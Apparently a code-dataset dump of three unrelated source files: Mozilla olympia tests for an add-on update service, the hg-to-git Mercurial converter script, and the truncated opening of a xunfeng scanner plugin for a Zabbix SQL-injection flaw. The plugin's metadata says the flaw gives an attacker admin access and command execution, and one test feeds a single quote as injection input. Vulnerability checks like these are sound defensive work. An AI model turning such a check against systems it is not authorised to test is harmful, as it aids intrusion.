# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
koehlermichael/olympia
|
apps/addons/tests/test_update.py
|
14
|
31922
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from email import utils
from django.db import connection
from nose.tools import eq_
import amo
import amo.tests
from addons.models import (Addon, CompatOverride, CompatOverrideRange,
IncompatibleVersions)
from applications.models import AppVersion
from files.models import File
from services import update
from versions.models import ApplicationsVersions, Version
class VersionCheckMixin(object):
def get(self, data):
up = update.Update(data)
up.cursor = connection.cursor()
return up
class TestDataValidate(VersionCheckMixin, amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/appversion']
def setUp(self):
super(TestDataValidate, self).setUp()
self.good_data = {
'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}',
'version': '2.0.58',
'reqVersion': 1,
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'appVersion': '3.7a1pre',
}
def test_app_os(self):
data = self.good_data.copy()
data['appOS'] = 'something %s penguin' % amo.PLATFORM_LINUX.api_name
form = self.get(data)
assert form.is_valid()
eq_(form.data['appOS'], amo.PLATFORM_LINUX.id)
def test_app_version_fails(self):
data = self.good_data.copy()
del data['appID']
form = self.get(data)
assert not form.is_valid()
def test_app_version_wrong(self):
data = self.good_data.copy()
data['appVersion'] = '67.7'
form = self.get(data)
# If you pass through the wrong version that's fine
# you will just end up with no updates because your
# version_int will be out.
assert form.is_valid()
def test_app_version(self):
data = self.good_data.copy()
form = self.get(data)
assert form.is_valid()
eq_(form.data['version_int'], 3070000001000)
def test_sql_injection(self):
data = self.good_data.copy()
data['id'] = "'"
up = self.get(data)
assert not up.is_valid()
def test_inactive(self):
addon = Addon.objects.get(pk=3615)
addon.update(disabled_by_user=True)
up = self.get(self.good_data)
assert not up.is_valid()
def test_soft_deleted(self):
addon = Addon.objects.get(pk=3615)
addon.update(status=amo.STATUS_DELETED)
up = self.get(self.good_data)
assert not up.is_valid()
def test_no_version(self):
data = self.good_data.copy()
del data['version']
up = self.get(data)
assert up.is_valid()
def test_unlisted_addon(self):
"""Don't provide updates for unlisted addons."""
addon = Addon.objects.get(pk=3615)
addon.update(is_listed=False)
up = self.get(self.good_data)
assert not up.is_valid()
class TestLookup(VersionCheckMixin, amo.tests.TestCase):
fixtures = ['addons/update', 'base/appversion']
def setUp(self):
super(TestLookup, self).setUp()
self.addon = Addon.objects.get(id=1865)
self.platform = None
self.version_int = 3069900200100
self.app = amo.APP_IDS[1]
self.version_1_0_2 = 66463
self.version_1_1_3 = 90149
self.version_1_2_0 = 105387
self.version_1_2_1 = 112396
self.version_1_2_2 = 115509
def get(self, *args):
data = {
'id': self.addon.guid,
'appID': args[2].guid,
'appVersion': 1, # this is going to be overridden
'appOS': args[3].api_name if args[3] else '',
'reqVersion': '',
}
# Allow version to be optional.
if args[0]:
data['version'] = args[0]
up = super(TestLookup, self).get(data)
assert up.is_valid()
up.data['version_int'] = args[1]
up.get_update()
return (up.data['row'].get('version_id'),
up.data['row'].get('file_id'))
def change_status(self, version, status):
version = Version.objects.get(pk=version)
file = version.files.all()[0]
file.status = status
file.save()
return version
def change_version(self, version, name):
Version.objects.get(pk=version).update(version=name)
def test_low_client(self):
"""
Version 3.0a1 of Firefox is 3000000001100 and version 1.0.2 of the
add-on is returned.
"""
version, file = self.get('', '3000000001100',
self.app, self.platform)
eq_(version, self.version_1_0_2)
def test_new_client(self):
"""
Version 3.0.12 of Firefox is 3069900200100 and version 1.2.2 of the
add-on is returned.
"""
version, file = self.get('', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_2)
def test_min_client(self):
"""
Version 3.7a5pre of Firefox is 3070000005000 and version 1.1.3 of
the add-on is returned, because all later ones are set to minimum
version of 3.7a5.
"""
for version in Version.objects.filter(pk__gte=self.version_1_2_0):
appversion = version.apps.all()[0]
appversion.min = AppVersion.objects.get(pk=325) # 3.7a5
appversion.save()
version, file = self.get('', '3070000005000', # 3.7a5pre
self.app, self.platform)
eq_(version, self.version_1_1_3)
def test_new_client_ordering(self):
"""
Given the following:
* Version 15 (1 day old), max application_version 3.6*
* Version 12 (1 month old), max application_version 3.7a
We want version 15, even though version 12 is for a higher version.
This was found in https://bugzilla.mozilla.org/show_bug.cgi?id=615641.
"""
application_version = ApplicationsVersions.objects.get(pk=77550)
application_version.max_id = 350
application_version.save()
# Version 1.2.2 is now a lower max version.
application_version = ApplicationsVersions.objects.get(pk=88490)
application_version.max_id = 329
application_version.save()
version, file = self.get('', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_2)
def test_public_not_beta(self):
"""
If the addon status is public and you are not asking
for a beta version, then you get a public version.
"""
self.change_status(self.version_1_2_2, amo.STATUS_PENDING)
eq_(self.addon.status, amo.STATUS_PUBLIC)
version, file = self.get('1.2', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_public_beta(self):
"""
If the addon status is public, you are in beta and the file is
beta, the you get a beta.
"""
self.change_version(self.version_1_2_0, '1.2beta')
self.change_status(self.version_1_2_0, amo.STATUS_BETA)
self.change_status(self.version_1_2_1, amo.STATUS_BETA)
version, file = self.get('1.2beta', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_can_downgrade(self):
"""
Check that we can downgrade, if 1.2.0 gets admin disabled
and the oldest public version is now 1.1.3.
"""
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
for v in Version.objects.filter(pk__gte=self.version_1_2_1):
v.delete()
version, file = self.get('1.2', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_1_3)
def test_public_pending_exists(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. In this case, because the
file is pending, we are looking for something public.
"""
self.change_status(self.version_1_2_2, amo.STATUS_PENDING)
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
self.change_version(self.version_1_2_0, '1.2beta')
version, file = self.get('1.2', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_public_pending_no_file_beta(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. If there are no files,
find a public version.
"""
self.change_version(self.version_1_2_0, '1.2beta')
Version.objects.get(pk=self.version_1_2_0).files.all().delete()
version, file = self.get('1.2beta', self.version_int,
self.app, self.platform)
dest = Version.objects.get(pk=self.version_1_2_2)
eq_(dest.addon.status, amo.STATUS_PUBLIC)
eq_(dest.files.all()[0].status, amo.STATUS_PUBLIC)
eq_(version, dest.pk)
def test_public_pending_not_exists(self):
"""
If the addon status is public and you are asking
for a beta version we look up a version based on the
file version at that point. In this case, because the
file is pending, we are looking for a public version.
"""
self.change_status(self.version_1_2_0, amo.STATUS_PENDING)
self.change_version(self.version_1_2_0, '1.2beta')
self.change_status(self.version_1_2_2, amo.STATUS_BETA)
version, file = self.get('1.2beta', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_not_public(self):
"""
If the addon status is not public, then the update only
looks for files within that one version.
"""
self.change_status(self.version_1_2_2, amo.STATUS_NULL)
self.addon.update(status=amo.STATUS_NULL)
version, file = self.get('1.2.1', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_platform_does_not_exist(self):
"""If client passes a platform, find that specific platform."""
version = Version.objects.get(pk=115509)
for file in version.files.all():
file.platform = amo.PLATFORM_LINUX.id
file.save()
version, file = self.get('1.2', self.version_int,
self.app, self.platform)
eq_(version, self.version_1_2_1)
def test_platform_exists(self):
"""If client passes a platform, find that specific platform."""
version = Version.objects.get(pk=115509)
for file in version.files.all():
file.platform = amo.PLATFORM_LINUX.id
file.save()
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_2)
def test_file_for_platform(self):
"""If client passes a platform, make sure we get the right file."""
version = Version.objects.get(pk=self.version_1_2_2)
file_one = version.files.all()[0]
file_one.platform = amo.PLATFORM_LINUX.id
file_one.save()
file_two = File(version=version, filename='foo', hash='bar',
platform=amo.PLATFORM_WIN.id,
status=amo.STATUS_PUBLIC)
file_two.save()
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_2)
eq_(file, file_one.pk)
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_WIN)
eq_(version, self.version_1_2_2)
eq_(file, file_two.pk)
def test_file_preliminary(self):
"""
If there's a newer file in prelim. review it won't show up. This is
a test for https://bugzilla.mozilla.org/show_bug.cgi?id=620749
"""
version = Version.objects.get(pk=self.version_1_2_2)
file = version.files.all()[0]
file.status = amo.STATUS_LITE
file.save()
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
def test_file_preliminary_addon(self):
"""
If the addon is in prelim. review, show the highest file with
prelim, which in this case is 1.2.1
"""
for status in amo.LITE_STATUSES:
self.addon.update(status=status)
# Since we're asking for an update from version 1.2, and
# we want to serve a prelim update, 1.2 needs to be
# prelim as well.
self.change_status(self.version_1_2_0, amo.STATUS_LITE)
self.change_status(self.version_1_2_1, amo.STATUS_LITE)
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
def test_file_preliminary_odd_statuses(self):
"""
Test that we serve prelim updates even when current version is
disabled or deleted.
"""
self.addon.update(status=amo.STATUS_LITE)
self.change_status(self.version_1_2_1, amo.STATUS_LITE)
# Current version disabled.
self.change_status(self.version_1_2_0, amo.STATUS_DISABLED)
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
# Current version deleted.
Version.objects.get(pk=self.version_1_2_0).delete()
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
def test_file_preliminary_ex_full_addon(self):
"""
If the addon is in prelim. review, user has a full reviewed version.
Show the most recent full reviewed version.
"""
self.addon.update(status=amo.STATUS_LITE)
self.change_status(self.version_1_2_2, amo.STATUS_LITE)
version, file = self.get('1.2', self.version_int,
self.app, amo.PLATFORM_LINUX)
eq_(version, self.version_1_2_1)
class TestDefaultToCompat(VersionCheckMixin, amo.tests.TestCase):
"""
Test default to compatible with all the various combinations of input.
"""
fixtures = ['addons/default-to-compat']
def setUp(self):
super(TestDefaultToCompat, self).setUp()
self.addon = Addon.objects.get(id=337203)
self.platform = None
self.app = amo.APP_IDS[1]
self.app_version_int_3_0 = 3000000200100
self.app_version_int_4_0 = 4000000200100
self.app_version_int_5_0 = 5000000200100
self.app_version_int_6_0 = 6000000200100
self.app_version_int_7_0 = 7000000200100
self.app_version_int_8_0 = 8000000200100
self.ver_1_0 = 1268881
self.ver_1_1 = 1268882
self.ver_1_2 = 1268883
self.ver_1_3 = 1268884
self.expected = {
'3.0-strict': None, '3.0-normal': None, '3.0-ignore': None,
'4.0-strict': self.ver_1_0,
'4.0-normal': self.ver_1_0,
'4.0-ignore': self.ver_1_0,
'5.0-strict': self.ver_1_2,
'5.0-normal': self.ver_1_2,
'5.0-ignore': self.ver_1_2,
'6.0-strict': self.ver_1_3,
'6.0-normal': self.ver_1_3,
'6.0-ignore': self.ver_1_3,
'7.0-strict': self.ver_1_3,
'7.0-normal': self.ver_1_3,
'7.0-ignore': self.ver_1_3,
'8.0-strict': None,
'8.0-normal': self.ver_1_3,
'8.0-ignore': self.ver_1_3,
}
def create_override(self, **kw):
co = CompatOverride.objects.create(
name='test', guid=self.addon.guid, addon=self.addon
)
default = dict(compat=co, app=self.app.id, min_version='0',
max_version='*', min_app_version='0',
max_app_version='*')
default.update(kw)
CompatOverrideRange.objects.create(**default)
def update_files(self, **kw):
for version in self.addon.versions.all():
for file in version.files.all():
file.update(**kw)
def get(self, **kw):
up = super(TestDefaultToCompat, self).get({
'reqVersion': 1,
'id': self.addon.guid,
'version': kw.get('item_version', '1.0'),
'appID': self.app.guid,
'appVersion': kw.get('app_version', '3.0'),
})
assert up.is_valid()
up.compat_mode = kw.get('compat_mode', 'strict')
up.get_update()
return up.data['row'].get('version_id')
def check(self, expected):
"""
Checks Firefox versions 3.0 to 8.0 in each compat mode and compares it
to the expected version.
"""
versions = ['3.0', '4.0', '5.0', '6.0', '7.0', '8.0']
modes = ['strict', 'normal', 'ignore']
for version in versions:
for mode in modes:
eq_(self.get(app_version=version, compat_mode=mode),
expected['-'.join([version, mode])],
'Unexpected version for "%s-%s"' % (version, mode))
def test_baseline(self):
# Tests simple add-on (non-binary-components, non-strict).
self.check(self.expected)
def test_binary_components(self):
# Tests add-on with binary_components flag.
self.update_files(binary_components=True)
self.expected.update({
'8.0-normal': None,
})
self.check(self.expected)
def test_extension_compat_override(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override.
self.create_override(min_version='1.3', max_version='1.3')
self.expected.update({
'6.0-normal': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': self.ver_1_2,
})
self.check(self.expected)
def test_binary_component_compat_override(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override.
self.update_files(binary_components=True)
self.create_override(min_version='1.3', max_version='1.3')
self.expected.update({
'6.0-normal': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': None,
})
self.check(self.expected)
def test_strict_opt_in(self):
# Tests add-on with opt-in strict compatibility
self.update_files(strict_compatibility=True)
self.expected.update({
'8.0-normal': None,
})
self.check(self.expected)
def test_compat_override_max_addon_wildcard(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a max wildcard.
self.create_override(min_version='1.2', max_version='1.3',
min_app_version='5.0', max_app_version='6.*')
self.expected.update({
'5.0-normal': self.ver_1_1,
'6.0-normal': self.ver_1_1,
})
self.check(self.expected)
def test_compat_override_max_app_wildcard(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a min/max wildcard for the app.
self.create_override(min_version='1.2', max_version='1.3')
self.expected.update({
'5.0-normal': self.ver_1_1,
'6.0-normal': self.ver_1_1,
'7.0-normal': self.ver_1_1,
'8.0-normal': self.ver_1_1,
})
self.check(self.expected)
def test_compat_override_both_wildcards(self):
# Tests simple add-on (non-binary-components, non-strict) with a compat
# override that contains a wildcard for both addon version and app
# version.
self.create_override(min_app_version='7.0', max_app_version='*')
self.expected.update({
'7.0-normal': None,
'8.0-normal': None,
})
self.check(self.expected)
def test_compat_override_invalid_version(self):
# Tests compat override range where version doesn't match our
# versioning scheme. This results in no versions being written to the
# incompatible_versions table.
self.create_override(min_version='ver1', max_version='ver2')
eq_(IncompatibleVersions.objects.all().count(), 0)
def test_min_max_version(self):
# Tests the minimum requirement of the app maxVersion.
av = self.addon.current_version.apps.all()[0]
av.min_id = 233 # Firefox 3.0.
av.max_id = 268 # Firefox 3.5.
av.save()
self.expected.update({
'3.0-strict': self.ver_1_3,
'3.0-ignore': self.ver_1_3,
'4.0-ignore': self.ver_1_3,
'5.0-ignore': self.ver_1_3,
'6.0-strict': self.ver_1_2,
'6.0-normal': self.ver_1_2,
'7.0-strict': self.ver_1_2,
'7.0-normal': self.ver_1_2,
'8.0-normal': self.ver_1_2,
})
self.check(self.expected)
class TestResponse(VersionCheckMixin, amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/seamonkey']
def setUp(self):
super(TestResponse, self).setUp()
self.addon_one = Addon.objects.get(pk=3615)
self.good_data = {
'id': '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}',
'version': '2.0.58',
'reqVersion': 1,
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'appVersion': '3.7a1pre',
}
self.mac = amo.PLATFORM_MAC
self.win = amo.PLATFORM_WIN
def test_bad_guid(self):
data = self.good_data.copy()
data["id"] = "garbage"
up = self.get(data)
eq_(up.get_rdf(), up.get_bad_rdf())
def test_no_platform(self):
file = File.objects.get(pk=67442)
file.platform = self.win.id
file.save()
data = self.good_data.copy()
data["appOS"] = self.win.api_name
up = self.get(data)
assert up.get_rdf()
eq_(up.data['row']['file_id'], file.pk)
data["appOS"] = self.mac.api_name
up = self.get(data)
eq_(up.get_rdf(), up.get_no_updates_rdf())
def test_different_platform(self):
file = File.objects.get(pk=67442)
file.platform = self.win.id
file.save()
file_pk = file.pk
file.id = None
file.platform = self.mac.id
file.save()
mac_file_pk = file.pk
data = self.good_data.copy()
data['appOS'] = self.win.api_name
up = self.get(data)
up.is_valid()
up.get_update()
eq_(up.data['row']['file_id'], file_pk)
data['appOS'] = self.mac.api_name
up = self.get(data)
up.is_valid()
up.get_update()
eq_(up.data['row']['file_id'], mac_file_pk)
def test_good_version(self):
up = self.get(self.good_data)
up.is_valid()
up.get_update()
assert up.data['row']['hash'].startswith('sha256:3808b13e')
eq_(up.data['row']['min'], '2.0')
eq_(up.data['row']['max'], '4.0')
def test_beta_version(self):
file = File.objects.get(pk=67442)
file.status = amo.STATUS_BETA
file.save()
beta_version = '2.0.58 beta'
version = file.version
version.version = beta_version
version.save()
# Changing the status of the only reviewed file resets the
# add-on status to UNREVIEWED. Change it back to public.
version.addon.update(status=amo.STATUS_PUBLIC)
data = self.good_data.copy()
up = self.get(data)
up.is_valid()
assert not up.get_update()
data["version"] = beta_version
up = self.get(data)
up.is_valid()
up.get_update()
eq_(up.data['row']['file_id'], file.pk)
def test_no_app_version(self):
data = self.good_data.copy()
data['appVersion'] = '1.4'
up = self.get(data)
up.is_valid()
assert not up.get_update()
def test_low_app_version(self):
data = self.good_data.copy()
data['appVersion'] = '2.0'
up = self.get(data)
up.is_valid()
up.get_update()
assert up.data['row']['hash'].startswith('sha256:3808b13e')
eq_(up.data['row']['min'], '2.0')
eq_(up.data['row']['max'], '4.0')
def test_content_type(self):
up = self.get(self.good_data)
('Content-Type', 'text/xml') in up.get_headers(1)
def test_cache_control(self):
up = self.get(self.good_data)
('Cache-Control', 'public, max-age=3600') in up.get_headers(1)
def test_length(self):
up = self.get(self.good_data)
('Cache-Length', '1') in up.get_headers(1)
def test_expires(self):
"""Check there are these headers and that expires is 3600 later."""
# We aren't bother going to test the actual time in expires, that
# way lies pain with broken tests later.
up = self.get(self.good_data)
hdrs = dict(up.get_headers(1))
lm = datetime(*utils.parsedate_tz(hdrs['Last-Modified'])[:7])
exp = datetime(*utils.parsedate_tz(hdrs['Expires'])[:7])
eq_((exp - lm).seconds, 3600)
def test_appguid(self):
up = self.get(self.good_data)
rdf = up.get_rdf()
assert rdf.find(self.good_data['appID']) > -1
def get_file_url(self):
"""Return the file url with the hash as parameter."""
return ('/user-media/addons/3615/delicious_bookmarks-2.1.072-fx.xpi?'
'filehash=sha256%3A3808b13ef8341378b9c8305ca648200954ee7dcd8dc'
'e09fef55f2673458bc31f')
def test_url(self):
up = self.get(self.good_data)
up.get_rdf()
assert up.data['row']['url'] == self.get_file_url()
def test_url_local_recent(self):
a_bit_ago = datetime.now() - timedelta(seconds=60)
File.objects.get(pk=67442).update(datestatuschanged=a_bit_ago)
up = self.get(self.good_data)
up.get_rdf()
assert up.data['row']['url'] == self.get_file_url()
def test_url_remote_beta(self):
file = File.objects.get(pk=67442)
file.status = amo.STATUS_BETA
file.save()
beta_version = '2.0.58 beta'
file.version.update(version=beta_version)
data = self.good_data.copy()
data["version"] = beta_version
up = self.get(data)
self.addon_one.status = amo.STATUS_PUBLIC
self.addon_one.save()
up.get_rdf()
eq_(up.data['row']['file_id'], file.pk)
assert up.data['row']['url'] == self.get_file_url()
def test_hash(self):
rdf = self.get(self.good_data).get_rdf()
assert rdf.find('updateHash') > -1
file = File.objects.get(pk=67442)
file.hash = ''
file.save()
rdf = self.get(self.good_data).get_rdf()
eq_(rdf.find('updateHash'), -1)
def test_releasenotes(self):
rdf = self.get(self.good_data).get_rdf()
assert rdf.find('updateInfoURL') > -1
version = Version.objects.get(pk=81551)
version.update(releasenotes=None)
rdf = self.get(self.good_data).get_rdf()
eq_(rdf.find('updateInfoURL'), -1)
def test_sea_monkey(self):
data = {
'id': 'bettergmail2@ginatrapani.org',
'version': '1',
'appID': '{92650c4d-4b8e-4d2a-b7eb-24ecf4f6b63a}',
'reqVersion': 1,
'appVersion': '1.0',
}
up = self.get(data)
rdf = up.get_rdf()
assert up.data['row']['hash'].startswith('sha256:9d9a389')
eq_(up.data['row']['min'], '1.0')
eq_(up.data['row']['version'], '0.5.2')
assert rdf.find(data['appID']) > -1
def test_no_updates_at_all(self):
self.addon_one.versions.all().delete()
upd = self.get(self.good_data)
eq_(upd.get_rdf(), upd.get_no_updates_rdf())
def test_no_updates_my_fx(self):
data = self.good_data.copy()
data['appVersion'] = '5.0.1'
upd = self.get(data)
eq_(upd.get_rdf(), upd.get_no_updates_rdf())
class TestFirefoxHotfix(VersionCheckMixin, amo.tests.TestCase):
def setUp(self):
"""Create a "firefox hotfix" addon with a few versions.
Check bug 1031516 for more info.
"""
super(TestFirefoxHotfix, self).setUp()
self.addon = amo.tests.addon_factory(guid='firefox-hotfix@mozilla.org')
# First signature changing hotfix.
amo.tests.version_factory(addon=self.addon, version='20121019.01',
min_app_version='10.0',
max_app_version='16.*')
# Second signature changing hotfix.
amo.tests.version_factory(addon=self.addon, version='20130826.01',
min_app_version='10.0',
max_app_version='24.*')
# Newest version compatible with any Firefox.
amo.tests.version_factory(addon=self.addon, version='20202020.01',
min_app_version='10.0',
max_app_version='30.*')
self.data = {
'id': 'firefox-hotfix@mozilla.org',
'appID': '{ec8030f7-c20a-464f-9b0e-13a3a9e97384}',
'reqVersion': '2',
}
def test_10_16_first_hotfix(self):
"""The first hotfix changing the signature should be served."""
self.data['version'] = ''
self.data['appVersion'] = '16.0.1'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20121019.01') > -1
def test_10_16_second_hotfix(self):
"""The second hotfix changing the signature should be served."""
self.data['version'] = '20121019.01'
self.data['appVersion'] = '16.0.1'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20130826.01') > -1
def test_10_16_newest_hotfix(self):
"""The newest hotfix should be served."""
self.data['version'] = '20130826.01'
self.data['appVersion'] = '16.0.1'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20202020.01') > -1
def test_16_24_second_hotfix(self):
"""The second hotfix changing the signature should be served."""
self.data['version'] = ''
self.data['appVersion'] = '16.0.2'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20130826.01') > -1
def test_16_24_newest_hotfix(self):
"""The newest hotfix should be served."""
self.data['version'] = '20130826.01'
self.data['appVersion'] = '16.0.2'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20202020.01') > -1
def test_above_24_latest_version(self):
"""The newest hotfix should be served."""
self.data['version'] = ''
self.data['appVersion'] = '28.0'
up = self.get(self.data)
rdf = up.get_rdf()
assert rdf.find('20202020.01') > -1
|
bsd-3-clause
|
qsnake/git
|
contrib/hg-to-git/hg-to-git.py
|
47
|
7867
|
#!/usr/bin/env python
""" hg-to-git.py - A Mercurial to GIT converter
Copyright (C)2007 Stelian Pop <stelian@popies.net>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
"""
import os, os.path, sys
import tempfile, pickle, getopt
import re
# Maps hg version -> git version
hgvers = {}
# List of children for each hg revision
hgchildren = {}
# List of parents for each hg revision
hgparents = {}
# Current branch for each hg revision
hgbranch = {}
# Number of new changesets converted from hg
hgnewcsets = 0
#------------------------------------------------------------------------------
def usage():
print """\
%s: [OPTIONS] <hgprj>
options:
-s, --gitstate=FILE: name of the state to be saved/read
for incrementals
-n, --nrepack=INT: number of changesets that will trigger
a repack (default=0, -1 to deactivate)
-v, --verbose: be verbose
required:
hgprj: name of the HG project to import (directory)
""" % sys.argv[0]
#------------------------------------------------------------------------------
def getgitenv(user, date):
env = ''
elems = re.compile('(.*?)\s+<(.*)>').match(user)
if elems:
env += 'export GIT_AUTHOR_NAME="%s" ;' % elems.group(1)
env += 'export GIT_COMMITTER_NAME="%s" ;' % elems.group(1)
env += 'export GIT_AUTHOR_EMAIL="%s" ;' % elems.group(2)
env += 'export GIT_COMMITTER_EMAIL="%s" ;' % elems.group(2)
else:
env += 'export GIT_AUTHOR_NAME="%s" ;' % user
env += 'export GIT_COMMITTER_NAME="%s" ;' % user
env += 'export GIT_AUTHOR_EMAIL= ;'
env += 'export GIT_COMMITTER_EMAIL= ;'
env += 'export GIT_AUTHOR_DATE="%s" ;' % date
env += 'export GIT_COMMITTER_DATE="%s" ;' % date
return env
#------------------------------------------------------------------------------
state = ''
opt_nrepack = 0
verbose = False
try:
opts, args = getopt.getopt(sys.argv[1:], 's:t:n:v', ['gitstate=', 'tempdir=', 'nrepack=', 'verbose'])
for o, a in opts:
if o in ('-s', '--gitstate'):
state = a
state = os.path.abspath(state)
if o in ('-n', '--nrepack'):
opt_nrepack = int(a)
if o in ('-v', '--verbose'):
verbose = True
if len(args) != 1:
raise Exception('params')
except:
usage()
sys.exit(1)
hgprj = args[0]
os.chdir(hgprj)
if state:
if os.path.exists(state):
if verbose:
print 'State does exist, reading'
f = open(state, 'r')
hgvers = pickle.load(f)
else:
print 'State does not exist, first run'
sock = os.popen('hg tip --template "{rev}"')
tip = sock.read()
if sock.close():
sys.exit(1)
if verbose:
print 'tip is', tip
# Calculate the branches
if verbose:
print 'analysing the branches...'
hgchildren["0"] = ()
hgparents["0"] = (None, None)
hgbranch["0"] = "master"
for cset in range(1, int(tip) + 1):
hgchildren[str(cset)] = ()
prnts = os.popen('hg log -r %d --template "{parents}"' % cset).read().strip().split(' ')
prnts = map(lambda x: x[:x.find(':')], prnts)
if prnts[0] != '':
parent = prnts[0].strip()
else:
parent = str(cset - 1)
hgchildren[parent] += ( str(cset), )
if len(prnts) > 1:
mparent = prnts[1].strip()
hgchildren[mparent] += ( str(cset), )
else:
mparent = None
hgparents[str(cset)] = (parent, mparent)
if mparent:
# For merge changesets, take either one, preferably the 'master' branch
if hgbranch[mparent] == 'master':
hgbranch[str(cset)] = 'master'
else:
hgbranch[str(cset)] = hgbranch[parent]
else:
# Normal changesets
# For first children, take the parent branch, for the others create a new branch
if hgchildren[parent][0] == str(cset):
hgbranch[str(cset)] = hgbranch[parent]
else:
hgbranch[str(cset)] = "branch-" + str(cset)
if not hgvers.has_key("0"):
print 'creating repository'
os.system('git init')
# loop through every hg changeset
for cset in range(int(tip) + 1):
# incremental, already seen
if hgvers.has_key(str(cset)):
continue
hgnewcsets += 1
# get info
log_data = os.popen('hg log -r %d --template "{tags}\n{date|date}\n{author}\n"' % cset).readlines()
tag = log_data[0].strip()
date = log_data[1].strip()
user = log_data[2].strip()
parent = hgparents[str(cset)][0]
mparent = hgparents[str(cset)][1]
#get comment
(fdcomment, filecomment) = tempfile.mkstemp()
csetcomment = os.popen('hg log -r %d --template "{desc}"' % cset).read().strip()
os.write(fdcomment, csetcomment)
os.close(fdcomment)
print '-----------------------------------------'
print 'cset:', cset
print 'branch:', hgbranch[str(cset)]
print 'user:', user
print 'date:', date
print 'comment:', csetcomment
if parent:
print 'parent:', parent
if mparent:
print 'mparent:', mparent
if tag:
print 'tag:', tag
print '-----------------------------------------'
# checkout the parent if necessary
if cset != 0:
if hgbranch[str(cset)] == "branch-" + str(cset):
print 'creating new branch', hgbranch[str(cset)]
os.system('git checkout -b %s %s' % (hgbranch[str(cset)], hgvers[parent]))
else:
print 'checking out branch', hgbranch[str(cset)]
os.system('git checkout %s' % hgbranch[str(cset)])
# merge
if mparent:
if hgbranch[parent] == hgbranch[str(cset)]:
otherbranch = hgbranch[mparent]
else:
otherbranch = hgbranch[parent]
print 'merging', otherbranch, 'into', hgbranch[str(cset)]
os.system(getgitenv(user, date) + 'git merge --no-commit -s ours "" %s %s' % (hgbranch[str(cset)], otherbranch))
# remove everything except .git and .hg directories
os.system('find . \( -path "./.hg" -o -path "./.git" \) -prune -o ! -name "." -print | xargs rm -rf')
# repopulate with checkouted files
os.system('hg update -C %d' % cset)
# add new files
os.system('git ls-files -x .hg --others | git update-index --add --stdin')
# delete removed files
os.system('git ls-files -x .hg --deleted | git update-index --remove --stdin')
# commit
os.system(getgitenv(user, date) + 'git commit --allow-empty -a -F %s' % filecomment)
os.unlink(filecomment)
# tag
if tag and tag != 'tip':
os.system(getgitenv(user, date) + 'git tag %s' % tag)
# delete branch if not used anymore...
if mparent and len(hgchildren[str(cset)]):
print "Deleting unused branch:", otherbranch
os.system('git branch -d %s' % otherbranch)
# retrieve and record the version
vvv = os.popen('git show --quiet --pretty=format:%H').read()
print 'record', cset, '->', vvv
hgvers[str(cset)] = vvv
if hgnewcsets >= opt_nrepack and opt_nrepack != -1:
os.system('git repack -a -d')
# write the state for incrementals
if state:
if verbose:
print 'Writing state'
f = open(state, 'w')
pickle.dump(hgvers, f)
# vim: et ts=8 sw=4 sts=4
|
gpl-2.0
|
superhuahua/xunfengES
|
celerynode/vuldb/zabbix_latest_sql.py
|
4
|
1378
|
# coding:utf-8
import re
import urllib2
def get_plugin_info():
plugin_info = {
"name": "Zabbix latest SQL注入",
"info": "攻击者通过此漏洞可获取管理员权限登陆后台,后台存在执行命令功能,导致服务器被入侵控制。",
"level": "高危",
"type": "SQL注入",
"author": "wolf@YSRC",
"url": "https://github.com/Medicean/VulApps/tree/master/z/zabbix/2",
"keyword": "tag:zabbix",
"source": 1
}
return plugin_info
def check(ip, port, timeout):
try:
url = "http://" + ip + ":" + str(port)
